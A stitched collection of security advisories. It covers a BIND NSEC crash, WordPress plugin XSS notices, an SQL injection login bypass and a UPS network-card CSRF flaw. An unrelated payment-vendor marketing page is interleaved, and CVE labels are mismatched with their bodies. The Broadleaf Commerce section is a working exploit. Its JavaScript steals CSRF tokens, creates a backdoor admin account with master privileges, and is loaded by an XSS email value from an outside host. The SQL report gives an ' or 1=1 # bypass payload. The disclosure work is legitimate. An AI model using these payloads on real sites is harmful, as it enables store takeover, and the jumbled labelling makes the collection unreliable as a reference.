A `named` instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (`synth-from-dnssec`) enabled can be remotely terminated using a zone with a malformed NSEC record.
This issue affects BIND 9 versions 9.16.8-S1 through 9.16.41-S1 and 9.18.11-S1 through 9.18.15-S1.

**CVE-2023-2829: Malformed NSEC records can cause named to terminate unexpectedly when synth-from-dnssec is enabled**

*   Updated on 21 Jun 2023
*   2 Minutes to read
*   Contributors
    

*   Print
    
*   Share
    
*   Dark
    
    Light
    

**CVE:** CVE-2023-2829

**Document version:** 2.0

**Posting date:** 21 June 2023

**Program impacted:** BIND 9

**Versions affected:**

BIND Supported Preview Edition

*   9.16.8-S1 -> 9.16.41-S1
*   9.18.11-S1 -> 9.18.15-S1

**Severity:** High

**Exploitable:** Remotely

**Description:**

A named instance configured to run as a DNSSEC-validating recursive resolver with the Aggressive Use of DNSSEC-Validated Cache (RFC 8198) option (synth-from-dnssec) enabled can be remotely terminated using a zone with a malformed NSEC record.

**Impact:**

By sending specific queries to the resolver, an attacker can cause named to terminate unexpectedly.

Note that the BIND configuration option synth-from-dnssec is enabled by default in all versions of BIND 9.18 and 9.18-S and newer. In earlier versions of BIND that had this option available, it was disabled unless activated explicitly in named.conf.

**CVSS Score:** 7.5

**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

For more information on the Common Vulnerability Scoring System and to obtain your specific environmental score please visit: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1.

**Workarounds:**

Setting synth-from-dnssec to no prevents the problem.

**Active exploits:**

We are not aware of any active exploits.

**Solution:**

Upgrade to the patched release most closely related to your current version of BIND 9:

BIND Supported Preview Edition is a special feature preview branch of BIND provided to eligible ISC support customers.

*   9.16.42-S1
*   9.18.16-S1

**Acknowledgments:**

ISC would like to thank Greg Kuechle from SaskTel for bringing this vulnerability to our attention.

**Document revision history:**

*   1.0 Early Notification, 14 June 2023
*   2.0 Public disclosure, 21 June 2023

**Related documents:**

See our BIND 9 Security Vulnerability Matrix for a complete listing of security vulnerabilities and versions affected.

**Do you still have questions?** Questions regarding this advisory should be mailed to security-officer@isc.org. _To report a new issue, please encrypt your message using security-officer@isc.org's PGP key, which can be found here: https://www.isc.org/pgpkey/. If you are unable to use encrypted email you may also report new issues at: https://www.isc.org/reportbug/._

**Note:**

ISC patches only currently supported versions. When possible we indicate EOL versions affected. For current information on which versions are actively supported, please see https://www.isc.org/download/.

**ISC Security Vulnerability Disclosure Policy:**

Details of our current security advisory policy and practice can be found in the ISC Software Defect and Security Vulnerability Disclosure Policy at https://kb.isc.org/docs/aa-00861.

The Knowledgebase article https://kb.isc.org/docs/cve-2023-2829 is the complete and official security advisory document.

**Legal Disclaimer:**

Internet Systems Consortium (ISC) is providing this notice on an "AS IS" basis. No warranty or guarantee of any kind is expressed in this notice and none should be implied. ISC expressly excludes and disclaims any warranties regarding this notice or materials referred to in this notice, including, without limitation, any implied warranty of merchantability, fitness for a particular purpose, absence of hidden defects, or of non-infringement. Your use or reliance on this notice or materials referred to in this notice is at your own risk. ISC may change this notice at any time. A stand-alone copy or paraphrase of the text of this document that omits the document URL is an uncontrolled copy. Uncontrolled copies may lack important information, be out of date, or contain factual errors.

CVE-2023-2829: CVE-2023-2829

An access control issue in Makves DCAP v3.0.0.122 allows unauthenticated attackers to obtain cleartext credentials via a crafted web request to the product API.

**Any Payment  
Any Place  
Any Processor**

**Turn-Key Payment Solutions for any Point of Sale**

We build industry-standard payment solutions for Point of Sale providers to meet the needs of merchants in any market. Security-centric solutions for virtually all processing platforms route through dozens of pre-certified devices from leading OEMs – all via a universal payments integration, empowering merchants to create a unified payments experience across brick and mortar, online, mobile and unattended applications. 

**Retail**

**Retail**

Solutions for General Retail, Clothing Stores, Department Stores and Specialized Retail

**Restaurant/Bar**

**Restaurant/Bar**

Solutions for Fine Dining, Casual Dining, Contemporary-Casual, Bars, Buffets and Cafes

**QSR/Fast-Casual**

**QSR/Fast-Casual**

Solutions for Fast-Food, Fast-Casual, Pop-ups and Food Trucks

**Parking**

**Parking**

Solutions for Hotels, Hospitals, Municipalities, Universities, Airports and Retail Centers

**Lodging**

**Lodging**

Solutions for Hotel, Bed and Breakfast, Motel and Restaurant

**Healthcare**

**Healthcare**

Solutions for Hospital, Pharmacy, Private practice, Dental and Veterinary

**Grocery**

**Grocery**

Solutions for High Volume Grocery, Bodegas and Convenience Stores

**Unattended**

**Unattended**

Solutions for Car Wash, Parking, Vending, Kiosk and Drive-Thru

**eCommerce**

**eCommerce**

Solutions for any business seeking to take payments online

**Cannabis**

**Cannabis**

Solutions for Dispensaries, Hemp and CBD

**Processor-Agnostic**

Datacap’s industry-standard payments integration delivers instant access to every major processor in North America and a best-in-class feature-set.   
In addition to major processors, Datacap also supports 1,000’s of ISOs and merchant service providers.

**Hardware Agnostic**

**One-to-many devices integration**

Datacap supports dozens of plug and play EMV-ready devices from leading OEMs via a universal hardware integration. 

\+ Other Industry-leading OEMs

**What our Partners are saying**

“We have used Datacap for many years for our in-store solutions, so it was a no-brainer for us to use them for e-Commerce as well. Now everything is tied together - payments, Point of Sale and inventory.”

Lahav WolachPresident/CEO Xsitra

“We started using Datacap in 2018 to add payments capabilities to our kiosks. Now, we are adding support cross-platform tokens that our customers can use to initiate payments in-store or via their own devices (eCommerce) for a true omnichannel experience. ”

John MillerCEO PopID

“Datacap has been phenomenal to work with. We are so happy to have them as a part of our greenbox machines. I swear by them and would recommend them to anyone looking to add payments to their Point of Sale.”

Zack JohnsonFDR & CEO greenbox Robotics

“My experience with Datacap has been great. Datacap helped me take a small store into something that can compete with the larger stores in terms of security, automation, and ease of use.”

Sal SalmanOwner Natural K9 Supplies

“We like Datacap so much, we stopped further development on competing platforms and encourage anyone using our system new and current to migrate to this solution. For new installations we generally all but require it.”

David De CoursyV.P. R & D Datapoint POS

“Datacap is a great partner that helps us navigate an ever-changing payments landscape so we can offer a variety of devices for most processors, with a minimum of upkeep on our end.”

Will AtkinsonPresident Cap Software

“Our EMV solution with Datacap adds another layer of protection against fraud for our customers. The process of using EMV was easy!  Our POS system made for a seamless transition from swiping cards to the chip. A quick session of staff training and we were off and running.”

Brandon BakerDir Fulfillment Svcs 2Touch POS

“Datacap's payments solution handles all sensitive card data and sends it directly to the Internet. It completely removes Brunswick POS and scoring system networks from PA-DSS scope and vastly lowers a bowling center’s IT complexity and cost”

Brandon MeigsDirector of Products Brunswick

“Datacap’s support and payment solutions helped us to make the move to EMV and the transition of our merchant's gift/loyalty platforms very easy.”

Megan HinmanPresident ProTouch Systems

"We use Datacap's NETePay software, which allows us to accept EMV payments in Canada and in the United States. With Datacap’s one-to-many approach, we will be able to easily swap PIN pads in the future without making any code changes"

Matthew TrappProduct Manager uBreakiFix

“Integrating with Datacap was the best decision we made this year! We are now able to offer an integrated EMV & PIN debit solution, which allows us to satisfy the needs of more of our customers."

Vanessa Ezri Business Development LivePOS

“The seamless functionality of Datacap's GIFTePay and Factor4’s gift & loyalty program makes it easy to issue, track and reconcile gift cards between locations. Our integration has enabled us to expand our market reach and offer our cutting-edge gift & loyalty solution to more merchants.”  

Francisco EoyoqueOwner Monte Alban

“One of the reasons we chose Datacap and Filmbot was because of their flexible pricing model. This allows us to budget accordingly for each year and know what we are spending without having to worry about per-transaction fees.”

Matthew Viragh Owner Nitehawk Cinemas

Previous

Next

**Let's talk Payments!**

CVE-2023-27243: Home

Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.6.1-GA.

**CVE-2023-33725 XSS Vulnerability leading to Admin Account on Broadleaf ECommerce Sites****Broadleaf Background Info**

Broadleaf is a Open source/Commerical E Commerce framework based on Spring/Thymeleaf Broadleaf Commerce All work below is done on their Demo application, but the vulnerabilities are in the underlying framework, the demo site is a thin layer built on top of the Broadleaf framework to showcase it.GitHub - BroadleafCommerce/DemoSite: The Broadleaf Heat Clinic Spring Boot application

The site is split into 2 different applications I'm focussing on.

**Site** : Which is the customer facing storefront.

**Admin** : Which is the backend admin interface used to administer the store, add/remove items, change prices etc.

**Burptrast** The Burptrast plugin was used to find the initial vulnerability, the Broadleaf Demo application was instrumented with Assess, which is provided to Burp via the Burptrast plugin.

**Finding**

**TLDR;** CVE-2023-33725. A XSS Vulnerability in the email field allows JS injection within the checkout page of the Site. But more seriously the same vulnerability appears in the Admin site. Allowing a Customer to register with the website, with a email address containing a XSS attack, when a Admin logs into the Admin site and views the list of customers, the XSS is triggered, which in turn creates a new Admin user, allowing the attacker to login a site Admin.

**Remediation****Fix**

CVE-2023-33725 has been fixed in broadleaf-6.2.6.1-GA if you are using an earlier version it is important to update as soon as possible.

**Mitigation**

If you cannot upgrade your Ecommerce site quickly, it is possible to mitigate this vulnerability by enabling XSS protections provided by broadleaf ( They are not enabled by default )

exploitProtection.xssEnabled\=true
exploitProtection.xsrfEnabled\=true
blc.site.enable.xssWrapper\=true

Of if you have this enabled already, you are safe from this vulnerability.

**Setup****Configuration Files****Agent Config**

If you use either Docker or Manual you will first need a contrast\_security.yaml file. Details of how to do this are under the **contrast\_security.yaml** section of Contrast-Community-Edition.md Once you have the credentials from the config file, copy the **api :** section into the contrast\_security.yaml file in this directory and point the agent at that file.

**Burptrast Config**

Details of how to configure Burptrast are available under README.md

**Docker**

Once you have added your TeamServer Credentials to contrast\_security.yaml, details above. Run the following command docker commands from this directory.

    docker build -t cve-2023-33725 .
    docker run -p 8443:8443 -p 8444:8444 cve-2023-33725
    

The build command may take a few minutes to run. Once running you should be able to access the demo site under https://localhost:8443 And the admin site under https://localhost:8444

**Manual**

**Prerequisities**

*   Java 11
*   Maven
*   Git

Clone the Broadleaf Demo site from github.

**Checkout**

git clone https://github.com/BroadleafCommerce/DemoSite.git  Cd into the directory, roll back to the vulnerable version and build

    cd DemoSite
    git checkout 369d26c
    mvn clean install
    

**Add Assess**

Edit the pom.xml file under DemoSite/site/pom.xml

And modify the properties to

    <properties>
        <debug.port>8000</debug.port>
        <debug.args>-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -javaagent:/location/to/assess/agent/jar/contrast-agent-4.13.1.jar -Dcontrast.config.path=/location/to/contrast/config/contrast_security.yaml</debug.args>
    </properties>
    

**\-javaagent** is the location of the contrast jar file. It can be downloaded fom maven https://repo1.maven.org/maven2/com/contrastsecurity/contrast-agent/4.13.1/contrast-agent-4.13.1.jar

**\-Dcontrast.config.path** is the location of the contast agent config file. This is used to configure and authenticate the agent against TeamServer.

**Build**

To build under DemoSite run the command mvn clean install Then to start up the site application run the following command from the DemoSite/site directory.

    cd site/
    mvn spring-boot:run
    

Once this has started up, from another terminal start up the admin application. This is run from the DemoSite/admin diretory.

    cd admin/
    mvn spring-boot:run
    

Once running you should be able to access the demo site under https://localhost:8443 And the admin site under https://localhost:8444

**Burptrast**

Full details of how to use Burptrast can be found here README.md

Once installed and configured, select the broadleaf-demo application from the list of applications and select update. You should see a large number of routes, these will be imported into the sitemap.

But before that, set the URL path to https localhost 8443 . As this is the URL we will be testing the application from. 

Then select Live Browse and Then Import Routes to Site Map. This will add all these routes to Burp’s sitemap making it easier for Burp to find vulnerabilities.

**Pentest****Finding the Vulnerability**

The Stored XSS vulnerability was first found by running a regular business flow of the site.

*   Select an Item
*   Add it to the Basket
*   Checkout as Guest
*   “Pay”

With Burptrast, findings in Assess triggered by a request from the Burp Proxy are automatically correlated with the session that made them and show up in Burp’s issue tab.

In this case the email address that was added at checkout, was tracked by Assess, saved to the underlying database, then on a following page it was returned to the user without any encoding to mitigate a potential XSS vulnerability.

**Verifying the Vulnerability**

While Assess showed that the value originating from a potential attacker, entered the database and was returned in a way that allows for a Stored XSS vulnerability, it could be that there are some validation or encoding that is done that Assess missed. Also as an email field, it is limited in what can be entered.

First, create a non guest customer account, this will be easier to verify this issue and more likely to be persistent than a guest user checkout.

Then once logged in we can edit the email address field on the profile. This XSS in a valid email address is from XSS in Email Login Fields:

"><svg/onload=alert(1)>"@gmail.com Which fails due to client side validation 

But by modifying a valid email change request in burp ( you need to use the url encoded version of the payload which is %60%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%22%40gmail.com%60 )

We bypass the client side validation and get  And we can verify the vulnerability by going to the checkout page.

**Exploiting the Vulnerability**

So we have a verified XSS Vulnerability, with which you can annoy yourself. But what else can it do?

There is a separate Admin site running on https://localhost:8444/admin

( default credentials for the demo site are admin:admin )

By going to customers page we immediately see that the admin site is vulnerable as it displays the signed up customer's email addresses and as this impacts the site admin we should be able to further leverage this XSS. 

**Creating an Admin Account via XSS**

Under https://localhost:8444/admin/user-management we have the ability of creating new admin users. 

This generates a POST request we can replicate within the XSS.

But there is an issue, there are two tokens within the request, a CSRFToken and StateVersionToken. If we want to create a new admin user we also need to find these tokens.

These tokens reside within the HTML of the generated page. So sending a GET request to /admin/user-management which doesn't change the application state and therefore doesn’t require a token, reveals the tokens.

function getTokenJS() {
    var xhr \= new XMLHttpRequest();
    xhr.responseType \= "document";
    xhr.open("GET", "/admin/user-management", true);
    xhr.onload \= function (e) {
        if (xhr.readyState \=== XMLHttpRequest.DONE && xhr.status \=== 200) {
            page \= xhr.response
            csrf \= page.getElementsByName("csrfToken");
            state \= page.getElementsByName("stateVersionToken");
            console.log("The token is: " + csrf\[0\].value);
            console.log("The state is: " + state\[0\].value);
            submitFormWithTokenJS(csrf\[0\].value, state\[0\].value);
        }
    };
    xhr.send(null);
}

This retrieves the CSRF and State tokens.

The next function takes the tokens and embeds them into the POST request to add the new admin user.

function submitFormWithTokenJS(token, state) {
    const username \= "backdooradmin";

    var xhr \= new XMLHttpRequest();
    xhr.open("POST", "/admin/user-management/add", true);
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhr.responseType \= "document";
    xhr.onreadystatechange \= function() {
        if(xhr.readyState \=== XMLHttpRequest.DONE && xhr.status \=== 200) {
            console.log(xhr.responseURL)
            var result \= /\[^/\]\*$/.exec(xhr.responseURL)\[0\];
            addAdminAccess(token,state,result);
        }
    }
    xhr.send("ceilingEntityClassname=org.broadleafcommerce.openadmin.server.security.domain.AdminUser&entityType=org.broadleafcommerce.openadmin.server.security.domain.AdminUserImpl&id=&sectionCrumbs=&mainEntityName=&preventSubmit=false&jsErrorMapString=&fields%5B'name'%5D.value="+username+"&fields%5B'login'%5D.value="+username+"&fields%5B'email'%5D.value="+username+"%40example.com&fields%5B'phoneNumber'%5D.value=&fields%5B'password'%5D.value="+username+"&fields%5B'passwordConfirm'%5D.value="+username+"&fields%5B'activeStatusFlag'%5D.value=true&fields%5B'auditable\_\_createdBy'%5D.value=&fields%5B'auditable\_\_dateCreated'%5D.value-display=&fields%5B'auditable\_\_dateCreated'%5D.value=&fields%5B'auditable\_\_updatedBy'%5D.value=&fields%5B'auditable\_\_dateUpdated'%5D.value-display=&fields%5B'auditable\_\_dateUpdated'%5D.value=&csrfToken="+token+"&stateVersionToken="+state);
}

There is a 3rd step. While the above generates the admin user, its a admin account with no privileges.

The next step gives the admin user master admin privileges.

function addAdminAccess(token,state,path) {
    var xhr \= new XMLHttpRequest();
    xhr.open("POST", "/admin/user-management/"+path+"/allRoles/add", true);
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhr.responseType \= "document";
    xhr.onreadystatechange \= function() {
        if(xhr.readyState \=== XMLHttpRequest.DONE && xhr.status \=== 200) {
      
        }
    }
    xhr.send("fields%5B'id'%5D.value=-1&fields%5B'description'%5D.value=Admin+Master+Access&fields%5B'\_\_adminMainEntity'%5D.value=ROLE\_ADMIN&csrfToken="+token+"&stateVersionToken="+state);
}

With this js file created, we just need to host it somewhere https://joebeeton.github.io/b.js

Then reference it in our original XSS by setting the customer email address to

"<script src='https://joebeeton.github.io/b.js' />"@ab.uk  ( you need to use the url encoded version of the payload which is %22%3Cscript%20src%3D%27https%3A%2F%2Fjoebeeton.github.io%2Fb.js%27%20%2F%3E%22%40ab.uk ) Then wait for an unsuspecting admin user to login, trigger the xss payload and generate the new admin account for us.  And from there the attacker can login with the credentials newadmin : newadmin as an admin and takeover the site.

CVE-2023-33725: Burptrast/docs/CVE-2023-33725 at main · Contrast-Security-OSS/Burptrast

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Automattic - Jetpack CRM team Jetpack CRM plugin <= 5.4.4 versions.

**Solution**

Fixed 

Update the WordPress Jetpack CRM plugin to the latest available version (at least 5.5.0).

TEAM WEBoB of BoB 11th discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Jetpack CRM Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 5.5.0.

**Other vulnerabilities in this plugin**

 0 present

 3 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-27429: WordPress Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation plugin <= 5.4.4 - Cross Site Scripting (XSS) - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WpSimpleTools Manage Upload Limit plugin <= 1.0.4 versions.

**Solution**

No fix 

No patched version is available. Reported to the WordPress plugins team (on Feb 24, 2023).

Mahesh Nagabhairava discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Manage Upload Limit Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-27432: WordPress Manage Upload Limit plugin <= 1.0.4 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Popup Box Team Popup box plugin <= 3.4.4 versions.

**Solution**

Fixed 

Update the WordPress Popup box plugin to the latest available version (at least 3.4.5).

Nguyen Xuan Chien discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Popup box Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 3.4.5.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-27414: WordPress Popup box plugin <= 3.4.4 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Stored Cross-Site Scripting (XSS) vulnerability in Teplitsa of social technologies Leyka plugin <= 3.29.2 versions.

**Solution**

Fixed 

Update the WordPress Leyka plugin to the latest available version (at least 3.30).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Leyka Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 3.30.

**Other vulnerabilities in this plugin**

 2 present

 2 patched

View all

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-27450: WordPress Leyka plugin <= 3.29.2 - Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Grant Kimball Simple Vimeo Shortcode plugin <= 2.9.1 versions.

**Solution**

No fix 

No patched version is available. Reported to the WordPress plugins team (on Feb 23, 2023).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Simple Vimeo Shortcode Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-27443: WordPress Simple Vimeo Shortcode plugin <= 2.9.1 - Cross Site Scripting (XSS) vulnerability - Patchstack

Sourcecodester Enrollment System Project V1.0 is vulnerable to SQL Injection (SQLI) attacks, which allow an attacker to manipulate the SQL queries executed by the application. The application fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code.

\> \[Suggested Description\]

\>

\> Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks.

\> This vulnerability allows an attacker to manipulate the SQL queries executed by the application.

\> The system fails to properly validate user-supplied input in the username and password fields during the login process,

\> enabling an attacker to inject malicious SQL code. By exploiting this vulnerability,

\> an attacker can bypass authentication and gain unauthorized access to the system.

\>

\> ------------------------------------------

\>

\> \[Additional Information\]

\> Step To Reproduce:

\>

\> The following steps outline the exploitation of the SQL Injection vulnerability in Enrollment System Project V1.0:

\>

\> 1. Launch the Enrollment System Project V1.0 application.

\>

\> 2. Open the login page by accessing the URL: http://localhost/enrollment/login.php.

\>

\> 3. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication: {' or 1=1 #}.

\>

\> 4. Click the login button to execute the SQL Injection payload.

\>

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\>  https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Enrollment System Project - V1.0

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\>  https://www.sourcecodester.com

\>  https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Vivek Choudhary

CVE-2023-33584: CVE/CVE-2023-33584/CVE-2023-33584.txt at main · sudovivek/CVE

There is a CSRF vulnerability on Netman-204 version 02.05. An attacker could manage to change administrator passwords through a Cross Site Request Forgery due to the lack of proper validation on the CRSF token. This vulnerability could allow a remote attacker to access the administrator panel, being able to modify different parameters that are critical for industrial operations.

Affected Resources

Netman-204, version 02.05.

Description

INCIBE has coordinated the publication of a vulnerability in Riello UPS Netman-204, a network adapter, which has been discovered by David Cámara Galindo.

The following code has been assigned to this vulnerability:

*   **CVE-2022-3372**:
    *   CVSS v3.1 base score: 8.8.
    *   CVSS vector string: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H.
    *   Vulnerability type: CWE-352: _Cross-Site Request Forgery_ (CSRF).

Solution

There is still no solution for the reported vulnerability.

Detail

*   **CVE-2022-3372**: an attacker could manage to change the administrator passwords due to lack of proper validation in the CRSF token. This vulnerability could allow a remote attacker to access the administrator panel, being able to modify different parameters that are critical for industrial operations.